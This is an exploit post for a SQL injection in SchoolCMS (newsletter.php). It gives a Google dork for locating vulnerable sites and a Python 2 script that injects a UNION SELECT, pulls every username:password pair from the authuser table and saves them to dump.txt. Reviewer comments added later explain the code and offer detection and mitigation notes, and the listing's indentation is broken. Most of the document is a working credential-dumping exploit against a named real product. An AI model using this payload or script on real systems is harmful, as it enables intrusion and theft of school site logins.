Code:
#Date: 11/28/12
#Author: Dyme
#Vendor: www.poweritschools.com
#Google Dork: inurl:/old_core/newsletter.php
#Tested on: Windows 8, Ubuntu 12.04
The vulnerability, a SQL injection, was found in the newsletter.php script. The Python 2 proof of concept below shows the request pattern it relies on.
#!/usr/bin/python
import urllib2
import re
def get_sauce(site):
    """Return the raw response body of an HTTP GET for the URL *site*.

    urlopen() is called with no timeout and no custom headers, so requests
    go out with urllib2's default ``Python-urllib/<version>`` User-Agent.
    Any urllib2 exception propagates to the caller unchanged.
    """
    return urllib2.urlopen(site).read()
# inject(site): proof-of-concept driver for the SQL injection named in the header.
# It rewrites the supplied URL, requests it repeatedly through get_sauce(), and
# writes each extracted "user:password" pair to stdout and to dump.txt.
#
# NOTE(review): this listing lost its indentation in extraction, so the nesting
# of the while / if / else below, and the exact end of the function body,
# cannot be confirmed from here.
#
# Defender notes, based only on what the code sends:
#   * Detection: query strings in which a parameter value begins with "-" and
#     is followed by "+UNION+SELECT+", "concat(uname,0x3a,passwd)",
#     "from+authuser" and a "LIMIT+n,1--" suffix whose n rises by one per
#     request; the header names newsletter.php as the affected script.
#   * Mitigation (server code is not shown, so this is the generic fix): bind
#     the parameter in a parameterized query or cast it to an integer, and do
#     not return internal error text to the client.
def inject(site):
# Locate the first "=" in the URL and insert "-" directly after it, so the
# parameter value is sent with a leading minus sign. If there is no "=",
# find() returns -1 and the "-" ends up at index 0 of the URL.
# presumably this makes the original query match no row, so that only the
# UNION row is rendered -- not verifiable from this listing
eqpos = site.find("=");
nsitelist = list(site)
nsitelist.insert(eqpos+1, "-")
nsite = ''.join(nsitelist)
# Output file in the current working directory; it is opened for writing
# (truncating any existing file) and never closed in the visible code.
dump = open('dump.txt', 'w')
# Row offset used in the LIMIT clause; one row is requested per HTTP request.
limit = 0
# 17-column UNION SELECT: column 6 carries uname and passwd from the authuser
# table joined by 0x3a (":"); the trailing "--" comments out the rest of the
# original statement.
syntax = nsite + "+UNION+SELECT+1,2,3,4,5,concat(uname,0x3a,passwd),7,8,9,10,11,12,13,14,15,16,17+from+authuser+LIMIT+" + str(limit) + ",1--"
sauce = get_sauce(syntax)
# The loop keeps going while the response contains this server error string.
# NOTE(review): the string appears to act as the marker that an injected row
# was rendered; that is an inference from how it is used here.
while "Error : Unable to access the templates directory" in sauce:
syntax = nsite + "+UNION+SELECT+1,2,3,4,5,concat(uname,0x3a,passwd),7,8,9,10,11,12,13,14,15,16,17+from+authuser+LIMIT+" + str(limit) + ",1--"
sauce = get_sauce(syntax)
if "Error : Unable to access the templates directory" in sauce:
# First ">name:value " match in the page; raises IndexError when the pattern
# does not match. Whether passwd holds hashes or plaintext is not visible here.
r = re.findall(">(.+):(.+) ", sauce)[0]
print r[0] + ":" + r[1]
dump.write(r[0] + ":" + r[1] + "\n")
limit += 1
else:
# Completion banner, printed once the marker string is absent from a response.
print "###########################################"
print "#All logins successfully dumped #"
print "#Logins saved in username:password format #"
print "#Logins dumped to dump.txt #"
print "#Bye! #"
print "###########################################"
# Startup banner (author logo, then the advisory header), emitted as a single
# newline-joined print so the output matches one print statement per line.
print "\n".join((
    " ______ ",
    "|_ _ `. ",
    " | | `. \ _ __ _ .--..--. .---. ",
    " | | | |[ \ [ ][ `.-. .-. |/ /__\\ ",
    " _| |_.' / \ '/ / | | | | | || \__., ",
    "|______.'[\_: / [___||__||__]'.__.' ",
    " \__.' ",
    "######################################",
    "#Title: SchoolCMS SQL Injection #",
    "#Date: 11/28/12 #",
    "#Author: Dyme #",
    "#Vendor: www.poweritschools.com #",
    "#Tested on: Windows 8, Ubuntu 12.04 #",
    "######################################",
))

# The URL is read interactively and handed to inject() as typed; the script
# performs no validation of it.
site = raw_input("Vulnerable link: ")
inject(site)